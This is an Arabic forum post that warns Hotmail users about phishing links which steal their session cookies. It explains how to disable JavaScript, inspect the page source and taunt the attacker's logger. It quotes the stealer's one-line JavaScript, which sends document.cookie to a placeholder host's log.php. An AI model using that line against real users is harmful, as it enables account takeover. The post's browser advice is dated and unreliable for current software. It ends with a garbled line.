عدد النقاط : 10
بسم الله الرحمن الرحيم اليوم عملت شرح لموضوع سرقة بريد الهوت ميل وهى طريقة سرقة ملف الكوكيز الخاص بيك بعد دخولك على موقع السارق عارفين ان ثغرة xss للهوتميل اتقفلت من زمااان لكن ظهرت ثغرات جديده حاليا وهيا برايفت عند ناس ومناسبة الشرح ده اني لاحظت مئات الايميلات الثلاثية والثنائيات يخترقوهم هؤلاء اللي معاهم الثغرة ماعلينا اليوم بعد ما تقرأ الموضوع ده انسى ان واحد يضحك عليك نفترض وصلتلك رسالة على البريد مضمونها اهلاً بك يا فلان مبروك ربحت 10000 ريال ادخل على الرابط التالي علشان تاخد الـ 10000 ريال طبعا انت فرحان ودخلت علطول وبعد ما دخلت ما لقيت شيء ممكن تلاقي صفحة بيضة ممكن تلاقي صورة بس تقول خسارة مليش نصيب في المبلغ طبعا بعدها بدقايق كان المخترق جاتله رساله ملف الكوكيز تبعك ودخل غير كل البيانات وراح الاميل عليك طبعا انت تقول الاميل انا كنت حميه و ماقبلتش اي حاجة من حد وكيف اميلى ينسرق وبعدها طبعا السارق دخل سحب باقى البيانات ومنها الدومين واخترق منتداك كمان وكل ده من اميلك لاااااااااااااا دلوقتي بقى انا هخليك انت الى تضحك عليه وتحرق دمه خليكو معايا وانتبهو جيدا ده مثال للرسالة اللي جاتلك وكان فيها الرابط استنة رايح فين اياك تفتح الرابط ! هتفتحه بس بعد ما تتبع الخطوات التالية : تعديل بسيط على اعدادات انترنت اكسبلورر روح على tools واختار internet options اللي هو اخر خيار بعدين تروح على security واضغط على custom level بعد كده ابحث عن Active Scripting وهي خاصية الجافا سكربت قم بتعطيلها من خلال اختيارك Disable الان انت فى امان ولو فتحت الصفحة مش هينسرق ملف الكوكيز بتاعك ادخل على الصفحة بقلب جامد بعد التاكد من ان خاصية الجافا وجعلها دسبلاي طيب الان انت دخلت الصفحة وعاوز تتأكد اذا ده واحد هدفه يسرق ايميلك والا لأ تعمل ايه ؟! روح من القائمة view اختار Source هيفتحلك مصدر الصفحة في مفكره فيها اكواد الصفحة طيب ابحث فيها عن الكود ده هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 776x414 . طبعا اكيد انتم شايفين ده عباره عن كود وفى اخره رابط السكربت بتاع المخترق علشان يسرق الكوكيز وده هو الملف بتاع سرقة الكوكيز معمول بخاصية الجافا سكربت عشان كده قلتلك عطل الجافا سكربت في المتصفح طبعا انت شفت الرابط الى فى اخر الكود www.xxx.com/vb/add.js طيب دلوقتى انت عرفت المصدر دلوقتى بقى انت عايز تحرق دمه وتعرفه انك انسان عاقل وفاهم ادخل على المتصفح وحط رابط ملف سرقة الكوكيز بتاع المخترق www.xxx.com/vb/add.js هيطلب منك انك تحمله حمله على جهازك واضغط عليه كلك يمين واختار open with واختار النوت باد طبعا انت دخلت على ملف الجافا سكربت لقيته كده طبعا انت مش فاهم ايه ده ؟؟؟؟؟؟ اقولك انا يا سيدى ده ملف سرقة الكوكيز ما علينا مش هطول عليكم وهقولكم الباقى عايز دلوقتى تجنينه وتخنقه وتخليه يشيييييييييط lo cat ion .h ref='http://www.xxxx.com/xxx/log.php?in de x='+escape(d ocu ment.c oo kie); طبعا هو فى الملف log.php فيه اميل المخترق تمااام دلوقتى احنا عايزين نوصله التحية بتاعتنا ونعرفه ان لعبته اتقفشت هتكتب كود PHP: www.xxxxx.com/xxx/log.php?index= وهنا اكتب الكلام الى عايزه يوصل للضحية مثل هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 766x101 . طيب تمام طبعا علطول بيروح تبيلغ للمخترق ان الكوكيز بتاع وصله وهيدخل وهو مبسوط وهيلاقى فى الرساله بدل الكوكيز الكلام بتاعك اللي انت كتبته شوفو مثال : طبعا هو ممكن ينفجر من الغيظ كده خلص موضوعنا ونصيحة للجميع اعمل لايميلك سؤال سري واجابة وايميل بديل يكون بتاعك علشان تسترجعه وقت اللزوم وبرنامج حماية قوي علشان يحميك من ملفات التجسس واهم شيء استخدام متصفح غير الاكسبلورر ممكن تستخدمو فايرفوكس مع التحديث دائما مثلي تحياتي للجميع EGY-MaF!4 المصدر: :: vBspiders Professional Network ::plhdm fv]; lk hghojvhr ufv svrm hg;,;d.
plhdm fv]; lk hghojvhr ufv svrm hg;,;d.